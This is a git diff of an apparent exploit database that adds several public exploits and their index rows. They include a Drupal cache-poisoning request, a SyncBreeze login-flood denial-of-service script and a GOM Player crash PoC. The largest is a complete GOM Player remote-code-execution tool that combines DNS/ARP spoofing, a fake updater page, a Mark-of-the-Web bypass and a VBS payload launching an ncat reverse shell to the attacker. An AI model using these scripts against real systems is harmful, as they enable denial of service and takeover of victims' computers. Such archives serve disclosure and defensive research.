+The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was
+submitted in the HTTP Host header.
+The application performed an HTTP request to the specified domain. For
+the second test, the attacker stored a response
+on the server with malicious content. This can be bad for a lot of
+users of this system if the attacker spreads a malicious URL
+and sends it by email etc. By using a redirect exploit.
+
+STATUS: HIGH-Vulnerability
+
+[+]Exploit:
+```GET
+GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
+Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
+Accept-Encoding: gzip, deflate, psp4hw87ev
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
+text/psp4hw87ev
+Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
+Safari/537.36 psp4hw87ev
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Origin: https://psp4hw87ev.pwnedhost.com
+```
+[+]Response from Burpcollaborator server:
+```HTTP
+HTTP/1.1 200 OK
+Server: Burp Collaborator https://burpcollaborator.net/
+X-Collaborator-Version: 4
+Content-Type: text/html
+Content-Length: 62
+
+<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>
+```
+
+[+]Response from Attacker server
+```HTTP
+192.168.100.45 - - [30/Aug/2023 05:52:56] "GET
+/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)
+
+## Time spend:
+03:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/python/webapps/51676.py b/exploits/python/webapps/51676.py
index 95d1d9d5d5..bf0a17b8ba 100755
--- a/exploits/python/webapps/51676.py
+++ b/exploits/python/webapps/51676.py
@@ -2,8 +2,6 @@
 # Exploit Author: Iyaad Luqman K (init_6)
 # Application: Maltrail v0.53
 # Tested on: Ubuntu 22.04
-# CVE: CVE-2023-27163
-
 
 # PoC
 import sys;
diff --git a/exploits/windows/dos/51725.py b/exploits/windows/dos/51725.py
new file mode 100755
index 0000000000..9ee6061111
--- /dev/null
+++ b/exploits/windows/dos/51725.py
@@ -0,0 +1,35 @@
+# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
+# Date: 30/08/2023
+# Exploit Author: mohamed youssef
+# Vendor Homepage: https://www.syncbreeze.com/
+# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
+# Version: 15.2.24
+# Tested on: windows 10 64-bit
+import socket
+import time
+
+
+pyload="username=admin&password="+'password='*500+""
+request=""
+request+="POST /login HTTP/1.1\r\n"
+request+="Host: 192.168.217.135\r\n"
+request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
+request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
+request+="Accept-Language: en-US,en;q=0.5\r\n"
+request+="Accept-Encoding: gzip, deflate\r\n"
+request+="Content-Type: application/x-www-form-urlencoded\r\n"
+request+="Content-Length: "+str(len(pyload))+"\r\n"
+request+="Origin: http://192.168.217.135\r\n"
+request+="Connection: keep-alive\r\n"
+request+="Referer: http://192.168.217.135/login\r\n"
+request+="Upgrade-Insecure-Requests: 1\r\n"
+request+="\r\n"
+request+=pyload
+
+print (request)
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.217.135",80))
+s.send(request.encode())
+print (s.recv(1024))
+s.close()
+time.sleep(5)
\ No newline at end of file
diff --git a/exploits/windows/local/51724.py b/exploits/windows/local/51724.py
new file mode 100755
index 0000000000..1298067878
--- /dev/null
+++ b/exploits/windows/local/51724.py
@@ -0,0 +1,29 @@
+# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 30.08.2023
+# Vendor Homepage: https://www.gomlab.com
+# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
+# Tested Version: 2.3.90.5360 (latest)
+# Tested on: Windows 11 64bit
+# Thanks to: M. Akil GÜNDOĞAN
+
+#  - Open GOM Player
+#  - Click on the gear icon above to open settings
+#  - From the menu that appears, select Audio
+#  - Click on Equalizer
+#  - Click on the plus sign to go to the "Add EQ preset" screen
+#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
+#  - Crashed!
+
+#!/usr/bin/python
+
+exploit = 'A' * 260
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC is not created")
\ No newline at end of file
diff --git a/exploits/windows/remote/51719.py b/exploits/windows/remote/51719.py
new file mode 100755
index 0000000000..865929244a
--- /dev/null
+++ b/exploits/windows/remote/51719.py
@@ -0,0 +1,119 @@
+# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
+# Date: 26.08.2023
+# Author: M. Akil Gündoğan
+# Contact: https://twitter.com/akilgundogan
+# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
+# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
+# Version: 2.3.90.5360
+# Tested on: Windows 10 Pro x64 22H2 19045.3324
+# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
+
+# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
+
+# Vulnerability Description:
+# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
+# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
+# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
+
+# Full disclosure, developers should be more careful about software security.
+
+# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
+
+# Some spaghetti and a bad code but it works :)
+
+banner = """\033[38;5;196m+-----------------------------------------------------------+
+|     GOM Player 2.3.90.5360 - Remote Code Execution        |
+|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
++-----------------------------------------------------------+\033[0m""" +"""
+\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
+
+import time,os,zipfile,subprocess,socket,sys
+
+print(banner)
+
+if os.geteuid() != 0:
+    print("You need root privileges to run the exploit, please use sudo...")
+    sys.exit(1)
+
+targetIP = input("- Target IP address: ")
+listenPort = input("- Listening port for Reverse Shell: ")
+
+def fCreate(fileName,fileContent): # File create func.
+    f = open(fileName,"w")
+    f.write(fileContent)
+    f.close()
+
+gw = os.popen("ip -4 route show default").read().split()
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.connect((gw[2], 0))
+ipaddr = s.getsockname()[0]
+gateway = gw[2]
+host = socket.gethostname()
+print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
+
+print("\n[*]- Stage 1: Downloading neccesary tools...")
+
+smbFolderName = "GomUpdater" # change this (optional)
+expWorkDir = "gomExploitDir" # change this (optional)
+os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
+time.sleep(1) # It's necessary for exploit stability.
+os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
+time.sleep(1) # It's necessary for exploit stability.
+os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
+print("    [*] - Ncat has been downloaded.")
+subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
+print("    [*] - Impacket has been downloaded.")
+subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
+print("    [*] - DNSSpoof.py has been downloaded.")
+
+print("[*]- Stage 2: Creating Attacker SMB Server...")
+subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
+time.sleep(5) # It's necessary for exploit stability.
+
+smbIP = ipaddr
+spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
+
+print("[*]- Stage 3: Creating Attacker Web Page...")
+
+# change this (optional)
+screenExpPage = """
+<meta charset="utf-8">
+<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
+<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
+</script>
+"""
+
+fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
+time.sleep(3) # It's necessary for exploit stability.
+
+print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
+vbsCommand = '''Set shell=CreateObject("wscript.shell")
+Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
+WScript.Sleep 5000
+Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
+vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
+fCreate(expWorkDir + "/payload.vbs",vbsCommand)
+
+urlShortcut = '''[InternetShortcut]
+URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
+IDlist='''
+fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
+time.sleep(3) # It's necessary for exploit stability.
+zipName = expWorkDir + "/smb-shared/archive.zip"
+payload_filename = os.path.join(expWorkDir, "payload.vbs")
+
+with zipfile.ZipFile(zipName, "w") as malzip:
+    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
+
+print("[*]- Stage 5: Running the attacker's web server...")
+subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
+time.sleep(3) # It's necessary for exploit stability.
+
+print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
+subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
+time.sleep(10) # It's neccesary for exploit stability.
+os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
+os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
+print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
+subprocess.run("nc -lvnp " + listenPort,shell=True)
+subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b5a776c7b3..df321cd7da 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3924,6 +3924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
+51720,exploits/hardware/remote/51720.py,"Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities",2023-09-08,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-09-08,2023-09-08,0,CVE-2023-34723,,,,,
 20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,remote,hardware,,2001-04-25,2012-08-25,1,CVE-2001-0484;OSVDB-551,,,,,https://www.securityfocus.com/bid/2659/info
 19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",remote,hardware,,1999-11-17,2012-07-06,1,CVE-1999-1508;OSVDB-113,,,,,https://www.securityfocus.com/bid/806/info
 6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,,
@@ -11639,6 +11640,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",webapps,multiple,,2011-11-19,2017-11-06,0,CVE-2011-4801;OSVDB-75656,,,,,
 50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",2022-06-14,"Andrea Intilangelo",webapps,multiple,,2022-06-14,2022-06-14,0,CVE-2022-29296,,,,,
 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,,2020-06-12,2020-06-12,0,CVE-2020-7030,,,,,
+51722,exploits/multiple/webapps/51722.txt,"Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS",2023-09-08,AmirZargham,webapps,multiple,,2023-09-08,2023-09-08,0,CVE-2022-31470,,,,,
 31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,,2008-04-18,2014-02-16,1,,,,,,https://www.securityfocus.com/bid/28848/info
 35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,webapps,multiple,,2011-01-18,2014-11-13,1,,,,,,https://www.securityfocus.com/bid/45911/info
 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 -  Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,,2020-09-25,2020-09-25,0,,,,,,
@@ -17234,6 +17236,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,webapps,php,,2009-12-20,,0,,,,,,
 9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
 3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
+51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
 22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
 1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,
@@ -21962,6 +21965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,webapps,php,,2008-11-01,,1,OSVDB-49511;CVE-2008-6269,,,,,
 45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-11,1,CVE-2018-15918,"SQL Injection (SQLi)",,http://www.exploit-db.com/screenshots/idlt45500/45340.png,,
 45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-06,0,CVE-2018-15917,"Cross-Site Scripting (XSS)",,,,
+51715,exploits/php/webapps/51715.txt,"Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",webapps,php,,2014-02-21,2015-12-29,1,OSVDB-104937,,,,,https://www.securityfocus.com/bid/66377/info
 8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,webapps,php,,2009-05-19,,1,OSVDB-61537,,,,,
 5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php,,2008-02-08,2016-11-14,1,OSVDB-40596;CVE-2007-5056,,,,http://www.exploit-db.comJournalness_4.1_Full.tar.gz,
@@ -30003,6 +30007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,webapps,php,,2007-03-10,,1,OSVDB-33986;CVE-2007-1425,,,,,
 36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,webapps,php,,2011-10-02,2015-02-27,1,CVE-2011-5169;OSVDB-76185,,,,,https://www.securityfocus.com/bid/49906/info
 2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",webapps,php,,2006-08-17,,1,OSVDB-28033;CVE-2006-4311,,,,,
+51718,exploits/php/webapps/51718.txt,"soosyze 2.0.0 - File Upload",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,,
 40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,,
 42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,,
@@ -30024,6 +30029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
 51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
+51714,exploits/php/webapps/51714.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection",2023-09-08,CraCkEr,webapps,php,,2023-09-08,2023-09-08,0,CVE-2023-4548,,,,,
 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
 12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,,
 12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,,
@@ -32927,6 +32933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php,,2012-11-09,2015-08-30,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56479/info
 17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,webapps,php,,2011-05-14,2011-05-14,0,,"WordPress Plugin",,,http://www.exploit-db.comeditormonkey.tar.gz,
 20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",webapps,php,,2012-08-05,2012-08-05,0,OSVDB-84462,"WordPress Plugin",,,,
+51716,exploits/php/webapps/51716.txt,"Wordpress Plugin Elementor 3.5.5 - Iframe Injection",2023-09-08,"Miguel Santareno",webapps,php,,2023-09-08,2023-09-08,0,CVE-2022-4953,,,,,
 50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",2022-04-19,AkuCyberSec,webapps,php,,2022-04-19,2022-04-22,0,,,,,,
 37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",webapps,php,,2012-06-07,2015-06-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53850/info
 43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,,2018-01-24,2018-01-24,1,,,,,http://www.exploit-db.comemail-subscribers.3.4.7.zip,
@@ -33913,6 +33920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
+51717,exploits/php/webapps/51717.py,"Wp2Fac - OS Command Injection",2023-09-08,"Ahmet Ümit BAYRAM",webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -34680,7 +34688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
-51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
+51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 51276,exploits/python/webapps/51276.go,"modoboa  2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@@ -38682,6 +38690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,,2017-10-27,2018-03-02,0,,,,,,
 43453,exploits/windows/dos/43453.py,"Sync Breeze Enterprise 10.1.16 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,,2018-01-08,2018-01-08,0,CVE-2017-15664,,,,http://www.exploit-db.comsyncbreezesrv_setup_v10.1.16.exe,
 44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,,2020-06-10,2020-06-10,0,,,,,,
+51725,exploits/windows/dos/51725.py,"SyncBreeze 15.2.24 - 'login' Denial of Service",2023-09-08,"mohamed youssef",dos,windows,,2023-09-08,2023-09-08,0,,,,,,
 41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",dos,windows,,2017-02-28,2017-02-28,0,CVE-2017-6371,,,,http://www.exploit-db.comsbbs316c.zip,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,,2020-01-20,2020-01-20,0,,,,,,
 24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows,,2013-04-09,2013-04-09,1,OSVDB-92081,,,,http://www.exploit-db.comsysaxserv_setup_6.10.msi,
@@ -40135,6 +40144,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
